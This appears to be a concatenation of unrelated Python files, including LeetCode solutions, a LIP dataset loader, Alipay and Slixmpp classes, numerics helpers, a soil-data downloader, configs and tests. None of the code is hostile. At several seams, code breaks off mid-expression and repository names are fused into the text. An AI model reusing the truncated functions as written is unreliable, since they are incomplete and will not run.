return sum(a * l * r for a, l, r in zip(A, left, right)) % mod # V1 # IDEA : increasing stacks + above improvement # https://leetcode.com/problems/sum-of-subarray-minimums/discuss/170750/JavaC%2B%2BPython-Stack-Solution class Solution: def sumSubarrayMins(self, A): res = 0 s = [] A = [0] + A + [0] for i, x in enumerate(A): while s and A[s[-1]] > x: j = s.pop() k = s[-1] res += A[j] * (i - j) * (j - k) s.append(i) return res % (10**9 + 7) # V1 # IDEA : STACK # https://leetcode.com/problems/sum-of-subarray-minimums/discuss/374000/stack-python # IDEA : # Using a stack like the other solutions # # left[i] = k # means a[i] is the unique minima in a[ i - k + 1:i + 1] # # right[i] = k # means a[i] is a minima (possibly among others) in a[ i:i + k] # # final answer # sigma a[i] * left[i] * right[i] # # two passes O(n) # plus a third to sigma and compute that cumulative sum class Solution(object): def sumSubarrayMins(self, A): mod = 10 ** 9 + 7 left = self.f(A) right = self.g(A) cs = 0 for i in range(len(A)): cs = (cs + left[i] * right[i] * A[i]) % mod return cs def f(self,A): stack = collections.deque([]) left = [0] * len(A) for i in range(len(A)): while(stack and A[stack[-1]] > A[i]): stack.pop() left[i] = i - (stack[-1] if stack else -1) stack.append(i) return left def g(self,A): stack = collections.deque([]) right = [0] * len(A) for i in range(len(A)-1,-1,-1): while(stack and A[stack[-1]] >= A[i]): stack.pop() right[i] = (stack[-1] if stack else len(A)) - i stack.append(i) return right # V1 # https://leetcode.com/problems/sum-of-subarray-minimums/discuss/170927/Python-Stack class Solution(object): def sumSubarrayMins(self, A): an = 0 stack = [[float('-inf'), 0, 0]] for x in A: c = 0 while stack[-1][0] >= x: c += stack.pop()[1] increase = stack[-1][2] + (c + 1)* x stack.append([x, c + 1, increase]) an += increase return an%(10**9+7) # V1 # https://leetcode.com/problems/sum-of-subarray-minimums/discuss/279705/python-solution class Solution: def sumSubarrayMins(self, A): n = len(A) left, right, sl, sr = [], [n] * n, [], [] for i in range(n): while sl and A[sl[-1]] > A[i]: sl.pop() left += [sl[-1]] if sl else [-1] sl += [i] for i in range(n): while sr and A[sr[-1]] > A[i]: right[sr.pop()] = i sr += [i] return sum(A[i] * (i - left[i]) * (right[i] - i) for i in range(n)) % (10**9 +7) # V1 # https://leetcode.jp/leetcode-907-sum-of-subarray-minimums-%E8%A7%A3%E9%A2%98%E6%80%9D%E8%B7%AF%E5%88%86%E6%9E%90/ # JAVA # public int sumSubarrayMins(int[] A) { # int[] leftBigger = new int[A.length]; # int[] rightBigger = new int[A.length]; # long sum = 0; # // 计算左边比自身大的数的个数 # for (int i = 0; i < A.length; i++) { # int countLeft = 1; # int j = i - 1; # while (j >= 0 && A[j] >= A[i]) { # countLeft += leftBigger[j]; # j -= leftBigger[j]; # } # leftBigger[i] = countLeft; # } # // 计算右边比自身大的数的个数 # for (int i = A.length - 1; i >= 0; i--) { # int countRight = 1; # int k = i + 1; # while (k < A.length && A[k] > A[i]) { # countRight += rightBigger[k]; # k += rightBigger[k]; # } # rightBigger[i] = countRight; # } # // 算出结果 # for (int i = 0; i < A.length; i++) { # sum += (A[i] * leftBigger[i] * rightBigger[i]); # } # return (int) (sum % 1000000007); # } # V1 # https://blog.csdn.net/zjucor/article/details/82721781 class Solution: def sumSubarrayMins(self, a): """ :type A: List[int] :rtype: int """ n=len(a) left,right=[0]*n,[0]*n st=[] for i,v in enumerate(a): while st and a[st[-1]]>v: idx=st.pop() right[idx]=i-idx st.append(i) while st: idx=st.pop() right[idx]=n-idx a=a[::-1] st=[] for i,v in enumerate(a): while st and a[st[-1]]>=v: idx=st.pop() left[idx]=i-idx st.append(i) while st: idx=st.pop() left[idx]=n-idx left=left[::-1] # print(left,right) a=a[::-1] res=0 mod=10**9+7 for i in range(n): # print(left[i]*right[i], a[i]) res+=left[i]*right[i]*a[i] res%=mod return res # V2 # Time: O(n) # Space: O(n) import itertools # Ascending stack solution class Solution(object): def sumSubarrayMins(self, A): """ :type A: List[int] :rtype: int """ M = 10**9 + 7 left, s1 = [0]*len(A), [] for i in range(len(A)): count = 1 while s1 and s1[-1][0] > A[i]: count += s1.pop()[1] left[i] = count s1.append([A[i], count]) right, s2 = [0]*len(A), [] for i in reversed(range(len(A))): count = 1 while s2 and s2[-1][0] >= A[i]: count += s2.pop()[1] right[i] = count s2.append([A[i], count]) return sum(a*l*r for a, l, r in zip(A, left, right)) % Mfoamliu/Look-Into-Person-v2 import os import random import cv2 as cv import numpy as np import torch from torch.utils.data import Dataset from torchvision import transforms from config import im_size, color_map, num_classes train_images_folder = 'data/instance-level_human_parsing/Training/Images' train_categories_folder = 'data/instance-level_human_parsing/Training/Category_ids' valid_images_folder = 'data/instance-level_human_parsing/Validation/Images' valid_categories_folder = 'data/instance-level_human_parsing/Validation/Category_ids' # Data augmentation and normalization for training # Just normalization for validation data_transforms = { 'train': transforms.Compose([ transforms.ToTensor(), transforms.Normalize([0.485, 0.456, 0.406], [0.229, 0.224, 0.225]), ]), 'valid': transforms.Compose([ transforms.ToTensor(), transforms.Normalize([0.485, 0.456, 0.406], [0.229, 0.224, 0.225]) ]), } def get_category(categories_folder, name): filename = os.path.join(categories_folder, name + '.png') semantic = cv.imread(filename, 0) return semantic def to_bgr(y_pred): ret = np.zeros((im_size, im_size, 3), np.float32) for r in range(320): for c in range(320): color_id = y_pred[r, c] # print("color_id: " + str(color_id)) ret[r, c, :] = color_map[color_id] ret = ret.astype(np.uint8) return ret def random_choice(image_size): height, width = image_size crop_height, crop_width = 320, 320 x = random.randint(0, max(0, width - crop_width)) y = random.randint(0, max(0, height - crop_height)) return x, y def safe_crop(mat, x, y): crop_height, crop_width = 320, 320 if len(mat.shape) == 2: ret = np.zeros((crop_height, crop_width), np.uint8) else: ret = np.zeros((crop_height, crop_width, 3), np.uint8) crop = mat[y:y + crop_height, x:x + crop_width] h, w = crop.shape[:2] ret[0:h, 0:w] = crop return ret class LIPDataset(Dataset): def __init__(self, split): self.usage = split if split == 'train': id_file = 'data/instance-level_human_parsing/Training/train_id.txt' self.images_folder = train_images_folder self.categories_folder = train_categories_folder else: id_file = 'data/instance-level_human_parsing/Validation/val_id.txt' self.images_folder = valid_images_folder self.categories_folder = valid_categories_folder with open(id_file, 'r') as f: self.names = f.read().splitlines() self.transformer = data_transforms[split] def __getitem__(self, i): name = self.names[i] filename = os.path.join(self.images_folder, name + '.jpg') img = cv.imread(filename) image_size = img.shape[:2] category = get_category(self.categories_folder, name) x, y = random_choice(image_size) img = safe_crop(img, x, y) category = safe_crop(category, x, y) category = np.clip(category, 0, num_classes - 1) if np.random.random_sample() > 0.5: img = np.fliplr(img) category = np.fliplr(category) img = img[..., ::-1] # RGB img = transforms.ToPILImage()(img) img = self.transformer(img) y = category return img, torch.from_numpy(y.copy()) def __len__(self): return len(self.names) if __name__ == "__main__": dataset = LIPDataset('train') print(dataset[0]) alexandru-dinu/competitive-programming0 # https://leetcode.com/problems/missing-number class Solution: def missingNumber(self, nums: List[int]) -> int: x = 0 for i in range(len(nums)): x ^= i ^ nums[i] return x ^ len(nums) # Slixmpp: The Slick XMPP Library # Copyright (C) 2015 # This file is part of Slixmpp. # See the file LICENSE for copying permission. from slixmpp.xmlstream import ElementBase class Confirm(ElementBase): name = 'confirm' namespace = 'http://jabber.org/protocol/http-auth' plugin_attrib = 'confirm' interfaces = {'id', 'url', 'method'} #!/usr/bin/env python import os from os.path import dirname from os.path import join app_dir = dirname(dirname(os.path.realpath(__file__))) prog = join(app_dir, "bin", "gen_data_sparse") # no trailing / prefix_path = join(app_dir, "datasets") params = { "num_train": 100 , "feature_dim": 10 , "num_partitions": 1 , "nnz_per_col": 10 , "one_based": True , "beta_sparsity": 0.5 , "correlation_strength": 0.5 , "noise_ratio": 0.1 , "snappy_compressed": "false" , "num_labels": 2 } params["output_file"] = join(prefix_path, "lr%d_dim%d_s%d_nnz%d") \ % (params["num_labels"], params["feature_dim"], \ params["num_train"], params["nnz_per_col"]) env_params = ( "GLOG_logtostderr=true " "GLOG_v=-1 " "GLOG_minloglevel=0 " ) cmd = env_params + prog cmd += "".join([" --%s=%s" % (k,v) for k,v in params.items()]) print cmd os.system(cmd) 1-10 import yaml, os class ConfigParser: def __init__(self, args): # load model configuration cfg_file = os.path.join('conf', args.config+'.yaml') with open(cfg_file) as f: self.config = yaml.load(f, Loader=yaml.FullLoader) # load argument for arg in args.__dict__: self.config[arg] = args.__dict__[arg] # string None handing self.convert_None(self.config) def __getitem__(self, name): return self.config[name] def convert_None(self, d): for key in d: if d[key] == 'None': d[key] = None if isinstance(d[key], dict): self.convert_None(d[key]) if __name__ == "__main__": import argparse args = argparse.ArgumentParser() args.add_argument('-c', '--config', default=None, type=str) args.add_argument('-d', '--device', default=None, type=str) args.add_argument('-r', '--resume', action='store_true') args = args.parse_args() args.config = "./conf/resnet_cfg.yaml" cp = ConfigParser(args) #!/usr/bin/env python # -*- coding: utf-8 -*- import json from alipay.aop.api.constant.ParamConstants import * class ZhimaCreditPayafteruseCreditagreementSignModel(object): def __init__(self): self._cancel_back_link = None self._category_id = None self._external_logon_id = None self._extra_param = None self._out_agreement_no = None self._product_code = None self._return_back_link = None self._zm_service_id = None @property def cancel_back_link(self): return self._cancel_back_link @cancel_back_link.setter def cancel_back_link(self, value): self._cancel_back_link = value @property def category_id(self): return self._category_id @category_id.setter def category_id(self, value): self._category_id = value @property def external_logon_id(self): return self._external_logon_id @external_logon_id.setter def external_logon_id(self, value): self._external_logon_id = value @property def extra_param(self): return self._extra_param @extra_param.setter def extra_param(self, value): self._extra_param = value @property def out_agreement_no(self): return self._out_agreement_no @out_agreement_no.setter def out_agreement_no(self, value): self._out_agreement_no = value @property def product_code(self): return self._product_code @product_code.setter def product_code(self, value): self._product_code = value @property def return_back_link(self): return self._return_back_link @return_back_link.setter def return_back_link(self, value): self._return_back_link = value @property def zm_service_id(self): return self._zm_service_id @zm_service_id.setter def zm_service_id(self, value): self._zm_service_id = value def to_alipay_dict(self): params = dict() if self.cancel_back_link: if hasattr(self.cancel_back_link, 'to_alipay_dict'): params['cancel_back_link'] = self.cancel_back_link.to_alipay_dict() else: params['cancel_back_link'] = self.cancel_back_link if self.category_id: if hasattr(self.category_id, 'to_alipay_dict'): params['category_id'] = self.category_id.to_alipay_dict() else: params['category_id'] = self.category_id if self.external_logon_id: if hasattr(self.external_logon_id, 'to_alipay_dict'): params['external_logon_id'] = self.external_logon_id.to_alipay_dict() else: params['external_logon_id'] = self.external_logon_id if self.extra_param: if hasattr(self.extra_param, 'to_alipay_dict'): params['extra_param'] = self.extra_param.to_alipay_dict() else: params['extra_param'] = self.extra_param if self.out_agreement_no: if hasattr(self.out_agreement_no, 'to_alipay_dict'): params['out_agreement_no'] = self.out_agreement_no.to_alipay_dict() else: params['out_agreement_no'] = self.out_agreement_no if self.product_code: if hasattr(self.product_code, 'to_alipay_dict'): params['product_code'] = self.product_code.to_alipay_dict() else: params['product_code'] = self.product_code if self.return_back_link: if hasattr(self.return_back_link, 'to_alipay_dict'): params['return_back_link'] = self.return_back_link.to_alipay_dict() else: params['return_back_link'] = self.return_back_link if self.zm_service_id: if hasattr(self.zm_service_id, 'to_alipay_dict'): params['zm_service_id'] = self.zm_service_id.to_alipay_dict() else: params['zm_service_id'] = self.zm_service_id return params @staticmethod def from_alipay_dict(d): if not d: return None o = ZhimaCreditPayafteruseCreditagreementSignModel() if 'cancel_back_link' in d: o.cancel_back_link = d['cancel_back_link'] if 'category_id' in d: o.category_id = d['category_id'] if 'external_logon_id' in d: o.external_logon_id = d['external_logon_id'] if 'extra_param' in d: o.extra_param = d['extra_param'] if 'out_agreement_no' in d: o.out_agreement_no = d['out_agreement_no'] if 'product_code' in d: o.product_code = d['product_code'] if 'return_back_link' in d: o.return_back_link = d['return_back_link'] if 'zm_service_id' in d: o.zm_service_id = d['zm_service_id'] return o from ..search import * import os import time import pytest import logging _log = logging.getLogger('yanytapi.search.test') api_key = os.environ['API_KEY'] def test_search_no_results(): api = SearchAPI(api_key) results = api.search('sadflkjsdf') start = time.perf_counter() assert len(list(results)) == 0 assert time.perf_counter()-start < 6 def test_auto_delay(): api = SearchAPI(api_key) results = api.search('trump') start = time.perf_counter() _log.debug("%s", results.__next__().__str__()) for i in range(0, 20): results.__next__() assert time.perf_counter()-start > 6 def test_backoff_exception(): with pytest.raises(TooManyRequestsException): api = SearchAPI(api_key) results = api.search('trump', auto_sleep=False) for i in range(0, 200): results.__next__() time.sleep(70) def test_page_limit(): api = SearchAPI(api_key) results = api.search('trump', page_limit=2, auto_sleep=False) assert len(list(results)) == 20 # Copyright 2021 # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. """ Grocery problem in OR-tools CP-SAT Solver. From , , Finite Domain http://www.mozart-oz.org/documentation/fdt/ Constraint Programming in Oz. A Tutorial. 2001. ''' A kid goes into a grocery store and buys four items. The cashier charges $7.11, the kid pays and is about to leave when the cashier calls the kid back, and says 'Hold on, I multiplied the four items instead of adding them; I'll try again; Hah, with adding them the price still comes to $7.11'. What were the prices of the four items? ''' This is a port of my old CP model grocery.py This model was created by () Also see my other OR-tools models: http://www.hakank.org/or_tools/ """ from __future__ import print_function from ortools.sat.python import cp_model as cp import math, sys from cp_sat_utils import prod, increasing from functools import reduce def main(): model = cp.CpModel() # # data # n = 4 c = 711 # # declare variables # item = [model.NewIntVar(0, c, "item[%i]" % i) for i in range(n)] # # constraints # model.Add(sum(item) == c) prod(model, item, c * 100**3) # symmetry breaking increasing(model, item) # # search and result # solver = cp.CpSolver() status = solver.Solve(model) if status == cp.OPTIMAL: print("item:", [solver.Value(item[i]) for i in range(n)]) print() print("NumConflicts:", solver.NumConflicts()) print("NumBranches:", solver.NumBranches()) print("WallTime:", solver.WallTime()) if __name__ == "__main__": main() puat133/MCMC-MultiSPDE # -*- coding: utf-8 -*- """ Created on Thu Dec 13 14:17:09 2018 @author: puat133 """ # import math import h5py import scipy.io as sio import numpy as np import scipy.linalg as sla import numba as nb import time import math FASTMATH=True PARALLEL = False CACHE=True # from numba import complex64, complex128, float32, float64, int32, jit, njit, prange SQRT2 = np.sqrt(2) njitSerial = nb.njit(fastmath=FASTMATH,cache=CACHE) jitSerial = nb.jit(fastmath=FASTMATH,cache=CACHE) njitParallel = nb.njit(fastmath=FASTMATH,cache=CACHE,parallel=PARALLEL) jitParallel = nb.jit(fastmath=FASTMATH,cache=CACHE,parallel=PARALLEL) @njitSerial def construct_w_Half(n): wHalf = np.random.randn(n)+1j*np.random.randn(n) # wHalf[0] = wHalf[0].real*np.sqrt(2) wHalf[0] = 2*wHalf[0].real # return wHalf/np.sqrt(2) return wHalf/SQRT2 @njitParallel def inner(u,v): sumUV = 0 for i in nb.prange(len(u)): sumUV += u[i]*v[i] return sumUV # @nb.vectorize([nb.complex128(nb.int64,nb.float64)],cache=CACHE,nopython=True) @njitParallel def eigenFunction1D(i,t): """ Return an eigen function of Laplacian operator in one dimension i - index int t - time float """ return np.exp(2*np.pi*1j*i*t) @njitParallel def matMulti(A,D): """ Matrix multiplication A@D where A,D is a diagonal matrices, and D is a diagonal matrix """ C = np.zeros(A.shape,dtype=np.complex128) for i in nb.prange(A.shape[0]): for j in nb.prange(A.shape[1]): C[i,j] = A[i,j]*D[j,j] return C # @njitParallel # def logDet(L): # """ # # The determinant of a Hermitian matrix is real;the determinant is the product of the matrix's eigenvalues # # L^dagger L is Hermitian # """ # return (np.linalg.slogdet(L)[1]) # # return 0.5*(np.linalg.slogdet(L.T.conj()@L)[1]) # # return 0.5*np.sum(np.log(np.linalg.eigvalsh(L.T.conj()@L))) # # return np.sum(np.log(np.absolute(np.linalg.eigvals(L)))) # @nb.vectorize([nb.float64(nb.float64)],cache=CACHE,nopython=True) @njitParallel def kappaFun(ut): """ kappa function as a function of u in time domain """ # res = np.zeros(ut.shape[0],dtype=np.float64) # for i in nb.prange(ut.shape[0]): # res[i] = math.exp(-ut[i]) # return res return np.exp(-ut) # @nb.vectorize([nb.float64(nb.float64)],cache=CACHE,nopython=True) @njitParallel def kappa_pow_min_nu(ut): # res = np.zeros(ut.shape[0],dtype=np.float64) # for i in nb.prange(ut.shape[0]): # res[i] = math.exp(1.5*ut[i]) # return res # return kappaFun(ut)**(-1.5) return np.exp(1.5*ut) # @nb.vectorize([nb.float64(nb.float64)],cache=CACHE,nopython=True) @njitParallel def kappa_pow_half(ut): # res = np.zeros(ut.shape[0],dtype=np.float64) # for i in nb.prange(ut.shape[0]): # res[i] = math.exp(-0.5*ut[i]) # return res return np.exp(-0.5*ut) # return np.sqrt(kappaFun(ut)) @njitParallel def norm2(u): """ Compute euclidean squared norm 2 of a complex vector """ norm2=0 for i in nb.prange(len(u)): norm2 += u[i].imag*u[i].imag + u[i].real*u[i].real return norm2 def printProgressBar (iteration, total, prefix = '', suffix = '', decimals = 1, length = 100, fill = '#'): """ Call in a loop to create terminal progress bar @params: iteration - Required : current iteration (Int) total - Required : total iterations (Int) prefix - Optional : prefix string (Str) suffix - Optional : suffix string (Str) decimals - Optional : positive number of decimals in percent complete (Int) length - Optional : character length of bar (Int) fill - Optional : bar fill character (Str) """ percent = ("{0:." + str(decimals) + "f}").format(100 * (iteration / float(total))) filledLength = int(length * iteration // total) bar = fill * filledLength + '-' * (length - filledLength) print('\r%s |%s| %s%% %s' % (prefix, bar, percent, suffix), end = '\r') # Print New Line on Complete if iteration == total: print() @njitSerial def sigmasLancos(n): """ sigma Lancos coefficients for calculating inverse Fourier Transforms """ k = np.arange(1,n+1) return np.sin(np.pi*(k/(n+1)))/(np.pi*(k/(n+1))) @njitSerial def updateWelford(existingAggregate, newValue): (count, mean, M2) = existingAggregate count += 1 delta = newValue - mean mean += delta / count delta2 = newValue - mean M2 += delta * delta2 return (count, mean, M2) # # retrieve the mean, variance and sample variance from an aggregate @njitSerial def finalizeWelford(existingAggregate): (count, mean, M2) = existingAggregate # (mean, variance, sampleVariance) = (mean, M2/count, M2/(count - 1)) (mean, variance) = (mean, M2/count) # if count < 2: # return float('nan') # else: return (mean, variance) @njitSerial def extend(uSymmetric,num): n = (uSymmetric.shape[0]+1)//2 if num> n: z = np.zeros(2*num-1,dtype=np.complex128) z[(num-1)-(n-1):(num-1)+n] = uSymmetric return z else: return uSymmetric @njitSerial def symmetrize(w_half): w = np.concatenate((w_half[:0:-1].conj(),w_half)) #symmetrize return w def kaczmarz(A,b,max_iteration): m = A.shape[0] n = A.shape[1] if m != b.shape[0]: raise Exception("Matrix and vector size missmatch") #set initial condition: x = np.zeros(n,dtype=np.complex128) #computing probability of each row # prob_row = np.zeros(m,dtype=np.float64) A_row_squared_norm = np.zeros(m,dtype=np.float64) # A_normalized = A for i in nb.prange(m): A_row_squared_norm[i] = norm2(A[i,:]) #in_place_normalization A[i,:] = A[i,:]/np.sqrt(A_row_squared_norm[i]) b[i] = b[i]/np.sqrt(A_row_squared_norm[i]) # prob_row = A_row_squared_norm/np.sum(A_row_squared_norm) # cum_prob_row = np.zeros(m+1,dtype=np.float64) # cum_prob_row[0] = prob_row[0] # for i in nb.prange(1,m): # cum_prob_row[i] = cum_prob_row[i-1]+prob_row[i-1] # error = norm2(A@x - b) # while(error>tolerance): for k in nb.prange(max_iteration): i = k%m # i = get_random_index(cum_prob_row,np.random.rand(),m) x = x + (b[i] - inner(A[i,:],x.conj()) )*A[i,:] # error = norm2(A@x - b) # print('error = {0}, i = {1}'.format(error,i)) error = norm2(A@x - b) return x,error # @njitParallel def random_kaczmarz(A,b,max_iteration): m = A.shape[0] n = A.shape[1] if m != b.shape[0]: raise Exception("Matrix and vector size missmatch") #set initial condition: x = np.zeros(n,dtype=np.complex128) #computing probability of each row prob_row = np.zeros(m,dtype=np.float64) A_row_squared_norm = np.zeros(m,dtype=np.float64) for i in nb.prange(m): A_row_squared_norm[i] = norm2(A[i,:]) prob_row = A_row_squared_norm/np.sum(A_row_squared_norm) cum_prob_row = np.zeros(m+1,dtype=np.float64) cum_prob_row[0] = prob_row[0] for i in nb.prange(1,m): cum_prob_row[i] = cum_prob_row[i-1]+prob_row[i-1] # error = norm2(A@x - b) # while(error>tolerance): for k in nb.prange(max_iteration): i = get_random_index(cum_prob_row,np.random.rand(),m) x = x + (b[i] - inner(A[i,:],x.conj()) )*A[i,:]/A_row_squared_norm[i] # error = norm2(A@x - b) # print('error = {0}, i = {1}'.format(error,i)) error = norm2(A@x - b) return x,error @njitSerial def get_random_index(cum_prob_row,randNumber,m): i = 0 while cum_prob_row[i]franTarkenton/IntroToJenkins0 """ In this demo: a) Create a virtualenv b) install dependencies c) run script using virtualenv # source data: ag/cap: * https://catalogue.data.gov.bc.ca/dataset/agriculture-capability-mapping * http://www.env.gov.bc.ca/esd/distdata/ecosystems/Soil_Data/AgricultureCapability/AgCap_Map_GDB_20150923.zip soils data: * https://catalogue.data.gov.bc.ca/dataset/soil-mapping-data-packages * https://www.env.gov.bc.ca/esd/distdata/ecosystems/Soil_Data/Soil_Data_Pkgs/SOIL_Map_GDB_20160331.zip """ import os.path import subprocess import requests import constants import logging import zipfile import archook archook.get_arcpy(pro=True) import arcpy LOGGER = logging.getLogger() class DownloadData: def __init__(self, datadir, dryRun=False): self.datadir = datadir self.dryRun = dryRun if not os.path.exists(datadir): LOGGER.info(f"creating the directory: {datadir}") os.makedirs(datadir) def download(self): fname = os.path.join(self.datadir, 'agcap.zip') if not os.path.exists(fname): LOGGER.debug("downloading the ag data") url = constants.AG_DATA_URL r = requests.get(url) open(fname , 'wb').write(r.content) LOGGER.debug("extracting the ag data") with zipfile.ZipFile(fname, 'r') as zip_ref: zip_ref.extractall(self.datadir) fname2 = os.path.join(self.datadir, 'soil.zip') if not os.path.exists(fname2): LOGGER.debug("download the soil data") url = constants.SOIL_URL r = requests.get(url) open(fname2 , 'wb').write(r.content) LOGGER.debug("extracting the soil data") with zipfile.ZipFile(fname2, 'r') as zip_ref: zip_ref.extractall(self.datadir) def createResultant(self): outDir = os.path.join(self.datadir, constants.OUTPUT_GDB) if not os.path.exists(outDir): LOGGER.debug("creating the output FGDB") arcpy.management.CreateFileGDB(self.datadir, constants.OUTPUT_GDB) resultant = os.path.join(self.datadir, constants.OUTPUT_GDB, 'resultant') if not arcpy.Exists(resultant): fcList = self.getFeatureClasses() LOGGER.info("creating a resultant...") if not self.dryRun: arcpy.analysis.Union(fcList, resultant) def getFeatureClasses(self): contents = os.listdir(self.datadir) gdbs = [] for f in contents: LOGGER.debug(f"f is: {f}") if os.path.splitext(f)[1].lower() == '.gdb': gdbs.append(f) fcList = [] for gdb in gdbs: curdir = os.path.join(self.datadir, gdb) arcpy.env.workspace = curdir fcs = arcpy.ListFeatureClasses("*") for fc in fcs: fcPath = os.path.normpath(os.path.join(curdir, fc)) fcList.append(fcPath) listString = '\n'.join(fcList) LOGGER.info(f"feature classes: {listString}") return fcList if __name__ == '__main__': loglevel = logging.DEBUG # logging setup LOGGER.setLevel(loglevel) hndlr = logging.StreamHandler() formatter = logging.Formatter( "%(asctime)s - %(name)s - %(levelname)s - %(lineno)d - %(message)s" ) hndlr.setFormatter(formatter) LOGGER.addHandler(hndlr) LOGGER.debug("first test message") dl = DownloadData(constants.DATADIR, dryRun=True) dl.download() dl.createResultant() # -*- coding: utf-8 -*- # Generated by Django 1.11.4 on 2017-08-10 17:23 from __future__ import unicode_literals from django.db import migrations, models class Migration(migrations.Migration): dependencies = [ ('exams', '0003_auto_20170808_1707'), ] operations = [ migrations.RemoveField( model_name='assignment', name='olympiad', ), migrations.AddField( model_name='mockolympiad', name='due_date', field=models.DateField(blank=True, help_text='When the assignment should be due. Leave blank if not active this semester.', null=True), ), ] JohnVillalovos/controller """Configuration for Controller""" from starlette.config import Config config = Config("/etc/beaker/labcontroller.conf") pid_file = "/var/run/beaker-lab-controller/beaker-{service}.pid" # Process pid file. PROXY_PID_FILE = config("BEAKER_PROXY_PID_FILE", default=pid_file.format(service="proxy")) WATCHDOG_PID_FILE = config("BEAKER_WATCHDOG_PID_FILE", default=pid_file.format(service="watchdog")) TRANSFER_PID_FILE = config("BEAKER_TRANSFER_PID_FILE", default=pid_file.format(service="transfer")) PROVISION_PID_FILE = config("BEAKER_PROVISION_PID_FILE", default=pid_file.format(service="provision")) # Location of locally stored netboot files TFTP_ROOT = config("BEAKER_TFTP_ROOT", default="/var/lib/tftpboot") # How long to sleep between polls. SLEEP_TIME = config("BEAKER_POOL_SLEEP_TIME", cast=int, default=20) # Timeout for fetching distro images. IMAGE_FETCH_TIMEOUT = config("BEAKER_IMAGE_FETCH_TIMEOUT", cast=int, default=120) # Number of times to attempt failing power commands. POWER_ATTEMPTS = config("BEAKER_POWER_ATTEMPS", cast=int, default=5) # Location of locally stored job logs CACHEPATH = config("BEAKER_LOCAL_CACHEPATH", default="/var/www/beaker/logs") # Location of system console logs CONSOLE_LOGS = config("BEAKER_CONSOLE_LOGS", default="/var/consoles") # Regex pattern to use to find panics PANIC_REGEX = config( "BEAKER_PANIC_REGEX", default="Kernel panic|Oops[\\s:[]|general protection fault(?! ip:)|general protection handler: wrong gs|\\(XEN\\) Panic|kernel BUG at .+:[0-9]+!", ) # Regex pattern which matches OS major names which do not support x86 EFI EFI_EXCLUDED_OSMAJORS_REGEX = config( "BEAKER_EFI_EXCLUDED_OSMAJORS_REGEX", default="RedHatEnterpriseLinux(3|4|Server5|Client5|ServerGrid5)|Fedora1[234567]", ) script/nmf_olivetti.py #!/usr/bin/env python # based on http://scikit-learn.org/stable/auto_examples/decomposition/plot_faces_decomposition.html#sphx-glr-auto-examples-decomposition-plot-faces-decomposition-py # Authors: , , # License: BSD 3 clause import os, os.path import argparse import numpy as np import logging from time import time from numpy.random import RandomState import matplotlib.pyplot as plt from sklearn import decomposition from sklearn.datasets import fetch_olivetti_faces from sklearn.cluster import MiniBatchKMeans import networkx as nx import prmf def main(): parser = argparse.ArgumentParser(description=""" Run NMF following the scikit-learn demo on the Olivetti faces dataset. Prepare AMPL files to solve the same problem. """) parser.add_argument("outdir") args = parser.parse_args() comps_fp = os.path.join(args.outdir, "components.csv") data_image_fp = os.path.join(args.outdir, "olivetti_faces.png") comps_image_fp = os.path.join(args.outdir, "olivetti_comps.png") opt_fp = os.path.join(args.outdir, "optimize_log.txt") ampl_data_fp = os.path.join(args.outdir, "olivetti_data.dat") ampl_params_fp = os.path.join(args.outdir, "olivetti_params.dat") n_row, n_col = 2, 3 n_components = n_row * n_col image_shape = (64, 64) rng = RandomState(0) # 400 (10 people x 40 images) x 4096 (64 x 64 images) dataset = fetch_olivetti_faces(shuffle=True, random_state=rng) faces = dataset.data n_samples, n_features = faces.shape # TODO transpose due to way my AMPL model is written (maybe should be rewritten to keep # canonical obs x features data shape) with open(ampl_data_fp, 'w') as ampl_data_fh: prmf.write_ampl_data(faces.transpose(), ampl_data_fh) with open(ampl_params_fp, 'w') as ampl_params_fh: prmf.write_ampl_params(n_components, ampl_params_fh) # global centering faces_centered = faces - faces.mean(axis=0) # local centering faces_centered -= faces_centered.mean(axis=1).reshape(n_samples, -1) prmf.plot_olivetti_components(plt, faces_centered[:n_components], "First centered Olivetti faces") plt.savefig(data_image_fp) # objective: # 0.5 * ||X - WH||_Fro^2 # + alpha * l1_ratio * ||vec(W)||_1 # + alpha * l1_ratio * ||vec(H)||_1 # + 0.5 * alpha * (1 - l1_ratio) * ||W||_Fro^2 # + 0.5 * alpha * (1 - l1_ratio) * ||H||_Fro^2 name = 'Non-negative components - NMF' estimator = decomposition.NMF(n_components=n_components, init='nndsvda', tol=5e-3) center = False t0 = time() data = faces if center: data = faces_centered print("data shape {}".format(data.shape)) estimator.fit_transform(data) train_time = (time() - t0) print("done in %0.3fs" % train_time) if hasattr(estimator, 'cluster_centers_'): components_ = estimator.cluster_centers_ else: components_ = estimator.components_ # Plot an image representing the pixelwise variance provided by the # estimator e.g its noise_variance_ attribute. The Eigenfaces estimator, # via the PCA decomposition, also provides a scalar noise_variance_ # (the mean of pixelwise variance) that cannot be displayed as an image # so we skip it. #if (hasattr(estimator, 'noise_variance_') and # estimator.noise_variance_.ndim > 0): # Skip the Eigenfaces case # plot_gallery("Pixelwise variance", # estimator.noise_variance_.reshape(1, -1), n_col=1, # n_row=1) prmf.plot_olivetti_components(plt, components_[:n_components], '%s - Train time %.1fs' % (name, train_time)) plt.savefig(comps_image_fp) # n_components x n_col np.savetxt(comps_fp, estimator.components_, delimiter=",") # also write components for AMPL # transform comps to n_obs x n_latent Gs = [] comps = estimator.components_.transpose() n_obs, n_latent = comps.shape print("comps.shape:") print(comps.shape) for i in range(n_latent): latent_factor = comps[:,i] G = prmf.vec_to_graph_prim(latent_factor) Gs.append(G) with open(ampl_data_fp, 'a') as ampl_data_fh: # TODO # write_ampl_laplacians(Ls, ampl_data_fh) for i in range(len(Gs)): G = Gs[i] G_path = os.path.join(args.outdir, "manifold_{}.graphml".format(i)) nx.write_graphml(G, G_path) # TODO write to log file with other optimization components opt_fh = open(opt_fp, 'w') opt_fh.write("reconstruction_err_: {}\n".format(estimator.reconstruction_err_)) if __name__ == "__main__": main() """Collection of tests focused on the `data/synthetic.py` module.""" import numpy as np import pytest from deepdow.data.synthetic import sin_single class TestSin: @pytest.mark.parametrize('n_timesteps', [50, 120]) @pytest.mark.parametrize('period_length', [2, 5, 9]) @pytest.mark.parametrize('amplitude', [0.1, 10]) def test_basic(self, n_timesteps, period_length, amplitude): freq = 1 / period_length res = sin_single(n_timesteps, freq=freq, phase=0.4, amplitude=amplitude) assert isinstance(res, 